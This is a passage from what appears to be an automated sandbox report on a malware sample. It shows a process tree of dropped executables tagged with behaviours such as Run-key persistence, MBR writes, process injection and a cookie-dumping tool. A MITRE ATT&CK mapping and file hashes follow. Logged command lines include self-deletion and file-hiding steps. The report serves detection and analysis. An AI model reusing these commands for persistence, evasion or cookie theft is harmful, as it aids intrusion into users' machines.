                                                                                                • Checks whether UAC is enabled
                                                                                                PID:5684
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                PID:2264
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5428
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3200
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4812
                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                              1⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1140
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Checks processor information in registry
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:1004
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                              1⤵
                                                                                              • Drops file in Windows directory
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4808
                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              PID:2224
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:5848
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies Internet Explorer settings
                                                                                              • Modifies registry class
                                                                                              PID:6056
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5980
                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                              1⤵
                                                                                              • Modifies registry class
                                                                                              PID:5724
                                                                                            • C:\Users\Admin\AppData\Local\Temp\A44A.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\A44A.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:5636
                                                                                            • C:\Users\Admin\AppData\Local\Temp\AB12.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\AB12.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4744
                                                                                            • C:\Users\Admin\AppData\Local\Temp\CA62.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\CA62.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:4008
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CA62.exe"
                                                                                                2⤵
                                                                                                  PID:6116
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /T 10 /NOBREAK
                                                                                                    3⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5468
                                                                                              • C:\Users\Admin\AppData\Local\Temp\D502.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\D502.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:3340
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  2⤵
                                                                                                    PID:4676
                                                                                                • C:\Users\Admin\AppData\Local\Temp\DF54.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\DF54.exe
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5752
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4036
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      3⤵
                                                                                                        PID:5696
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                        3⤵
                                                                                                          PID:5784
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:2164
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          3⤵
                                                                                                            PID:4548
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\E1C6.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\E1C6.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5348
                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:4660
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:192
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E522.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\E522.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4968
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EF16.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\EF16.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4376
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FC46.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\FC46.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:1236
                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                              2⤵
                                                                                                                PID:5456
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1388.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\1388.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4472
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\28E6.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\28E6.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4992
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3AB9.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\3AB9.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6136
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                2⤵
                                                                                                                  PID:3924
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                  2⤵
                                                                                                                    PID:4136
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                    2⤵
                                                                                                                      PID:5064
                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                      "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                      2⤵
                                                                                                                        PID:5440
                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                        "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                        2⤵
                                                                                                                          PID:2784
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\425C.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\425C.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:188
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4904.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\4904.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5336
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                          2⤵
                                                                                                                            PID:6132
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:5088
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:4192
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5556
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4948
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5612
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5984
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:4132
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:4176
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:3200
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\91D9.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\91D9.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5968
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 868
                                                                                                                                              2⤵
                                                                                                                                              • Drops file in Windows directory
                                                                                                                                              • Program crash
                                                                                                                                              PID:5308
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 880
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:4008
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 892
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5928
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1060
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5728
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1160
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:1812
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1224
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:1728
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1512
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5324
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1604
                                                                                                                                              2⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:5368
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1624
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                              • Program crash
                                                                                                                                              PID:4528
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A2C3.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A2C3.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                                            PID:4572
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B189.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B189.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:2876
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdqedxje\
                                                                                                                                              2⤵
                                                                                                                                                PID:5196
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jawdutxb.exe" C:\Windows\SysWOW64\hdqedxje\
                                                                                                                                                2⤵
                                                                                                                                                  PID:5020

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                              Persistence

                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                              1
                                                                                                                                              T1060

                                                                                                                                              Bootkit

                                                                                                                                              1
                                                                                                                                              T1067

                                                                                                                                              BITS Jobs

                                                                                                                                              1
                                                                                                                                              T1197

                                                                                                                                              Defense Evasion

                                                                                                                                              Modify Registry

                                                                                                                                              3
                                                                                                                                              T1112

                                                                                                                                              BITS Jobs

                                                                                                                                              1
                                                                                                                                              T1197

                                                                                                                                              Install Root Certificate

                                                                                                                                              1
                                                                                                                                              T1130

                                                                                                                                              Credential Access

                                                                                                                                              Credentials in Files

                                                                                                                                              4
                                                                                                                                              T1081

                                                                                                                                              Discovery

                                                                                                                                              Software Discovery

                                                                                                                                              1
                                                                                                                                              T1518

                                                                                                                                              Query Registry

                                                                                                                                              4
                                                                                                                                              T1012

                                                                                                                                              System Information Discovery

                                                                                                                                              5
                                                                                                                                              T1082

                                                                                                                                              Security Software Discovery

                                                                                                                                              1
                                                                                                                                              T1063

                                                                                                                                              Peripheral Device Discovery

                                                                                                                                              1
                                                                                                                                              T1120

                                                                                                                                              Remote System Discovery

                                                                                                                                              1
                                                                                                                                              T1018

                                                                                                                                              Collection

                                                                                                                                              Data from Local System

                                                                                                                                              4
                                                                                                                                              T1005

                                                                                                                                              Command and Control

                                                                                                                                              Web Service

                                                                                                                                              1
                                                                                                                                              T1102

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                MD5

                                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                SHA1

                                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                SHA256

                                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                SHA512

                                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                MD5

                                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                SHA1

                                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                SHA256

                                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                SHA512

                                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                              • C:\Program Files\Windows Portable Devices\MYQNQHASBN\ultramediaburner.exe
                                                                                                                                                MD5

                                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                SHA1

                                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                SHA256

                                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                SHA512

                                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                              • C:\Program Files\Windows Portable Devices\MYQNQHASBN\ultramediaburner.exe
                                                                                                                                                MD5

                                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                SHA1

                                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                SHA256

                                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                SHA512

                                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                              • C:\Program Files\install.dat
                                                                                                                                                MD5

                                                                                                                                                806c3221a013fec9530762750556c332

                                                                                                                                                SHA1

                                                                                                                                                36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                SHA256

                                                                                                                                                9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                SHA512

                                                                                                                                                56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                              • C:\Program Files\install.dat
                                                                                                                                                MD5

                                                                                                                                                31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                                SHA1

                                                                                                                                                c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                                SHA256

                                                                                                                                                b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                                SHA512

                                                                                                                                                3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                              • C:\Program Files\install.dll
                                                                                                                                                MD5

                                                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                SHA1

                                                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                SHA256

                                                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                SHA512

                                                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                              • C:\Program Files\install.dll
                                                                                                                                                MD5

                                                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                SHA1

                                                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                SHA256

                                                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                SHA512

                                                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                              • C:\Program Files\libEGL.dll
                                                                                                                                                MD5

                                                                                                                                                cc0f81a657d6887e246f49151e60123d

                                                                                                                                                SHA1

                                                                                                                                                1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                                SHA256

                                                                                                                                                31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                                SHA512

                                                                                                                                                8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                                              • C:\ProgramData\2183556.exe
                                                                                                                                                MD5

                                                                                                                                                055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                SHA1

                                                                                                                                                9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                SHA256

                                                                                                                                                03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                SHA512

                                                                                                                                                914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                              • C:\ProgramData\2183556.exe
                                                                                                                                                MD5

                                                                                                                                                055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                SHA1

                                                                                                                                                9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                SHA256

                                                                                                                                                03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                SHA512

                                                                                                                                                914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                              • C:\ProgramData\7579183.exe
                                                                                                                                                MD5

                                                                                                                                                6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                SHA1

                                                                                                                                                673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                SHA256

                                                                                                                                                79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                SHA512

                                                                                                                                                a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                              • C:\ProgramData\7579183.exe
                                                                                                                                                MD5

                                                                                                                                                6c275e3ad15bd4b6852dea757dff4dd1

                                                                                                                                                SHA1

                                                                                                                                                673f52a43085a8fdc93fffe24f85213bb2ce1993

                                                                                                                                                SHA256

                                                                                                                                                79e17f3dd9608d4897768138ce765aa3fbc253e65dd0b1031ea821cb68f3c1db

                                                                                                                                                SHA512

                                                                                                                                                a8d2f693ccbba557d1e8b5cef567f49b63bd1bdcf867b624ae7417875dda07f177d3392010e39dd7ab9fb778fb0b6fe30359fb005a5305610c685949ca5a5f7b

                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                MD5

                                                                                                                                                055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                SHA1

                                                                                                                                                9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                SHA256

                                                                                                                                                03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                SHA512

                                                                                                                                                914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                MD5

                                                                                                                                                055a20b8347170594cbc8b8aa2197b2a

                                                                                                                                                SHA1

                                                                                                                                                9bd84ab6cb4df6cb0fd1c7a0fe7efe31357e1f10

                                                                                                                                                SHA256

                                                                                                                                                03c8a390f7030ea876188436d6cbe99592b739d40a53e60ad0869c4c6194d828

                                                                                                                                                SHA512

                                                                                                                                                914c928a4060ddc2bda4e96918c22c4df14160e869a6c5b62eeafe7bb1044006993532e55929d2d89bac08c1b896619b016a2caf6011d155646fb7421ba3b6f2

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                MD5

                                                                                                                                                86fa8125ff1184c230a7ab5df330ad6b

                                                                                                                                                SHA1

                                                                                                                                                a111aea070ec169281eeb319f4ee2275191d219d

                                                                                                                                                SHA256

                                                                                                                                                9f1427639b85e83184d9bb852018997dcd7a40dd5a8fb11a63a443917f01cd47

                                                                                                                                                SHA512

                                                                                                                                                5af0e743e43888d37f60386182b4e7a5fb77a476b68212a2ad179dcc8f6958dea5aacec3f9bba4869f50c56f57aa727b4387e5403d65b245c68c2f37607fda62

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                                                MD5

                                                                                                                                                b17c6b9e4f0c13879cf689b0d401922b

                                                                                                                                                SHA1

                                                                                                                                                076318e3e6948f723c31da85078ae375024874c9

                                                                                                                                                SHA256

                                                                                                                                                9aaec71f98a71f9b44f2def4b67f19fd8d728a4a4496256c8f4e0d4f03e79110

                                                                                                                                                SHA512

                                                                                                                                                a2f59a4bb0bac7c02bcf84dd1ea7812f4e30a28dc0083c0a7930cbdc59dc66183baa8c6db9218890e4adef2f0597cac7d5568424a9d724579d085df4c90cc238

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                MD5

                                                                                                                                                9b41918893a09035bd1bdf9d0294afb2

                                                                                                                                                SHA1

                                                                                                                                                f188cab858819b5bcd1f9fcbefc406a0a6e78598

                                                                                                                                                SHA256

                                                                                                                                                76ade958117b19f182428390fb7b222ff29d9377556cd3e2189f1b5c88f62d3c

                                                                                                                                                SHA512

                                                                                                                                                b96c0d45f0c84b8f8d8b2037ffffbdbfffe4290089c2d80d8f40b837098247f8840dde256397aa9f40af1031b3eee669033d65d44311e9c28cbe816ea27d0e59

                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                MD5

                                                                                                                                                ed235898389d66fcb6dfa965ce8a2b0f

                                                                                                                                                SHA1

                                                                                                                                                9aa78dc3259fc43523ac231f2798a227a8679be9

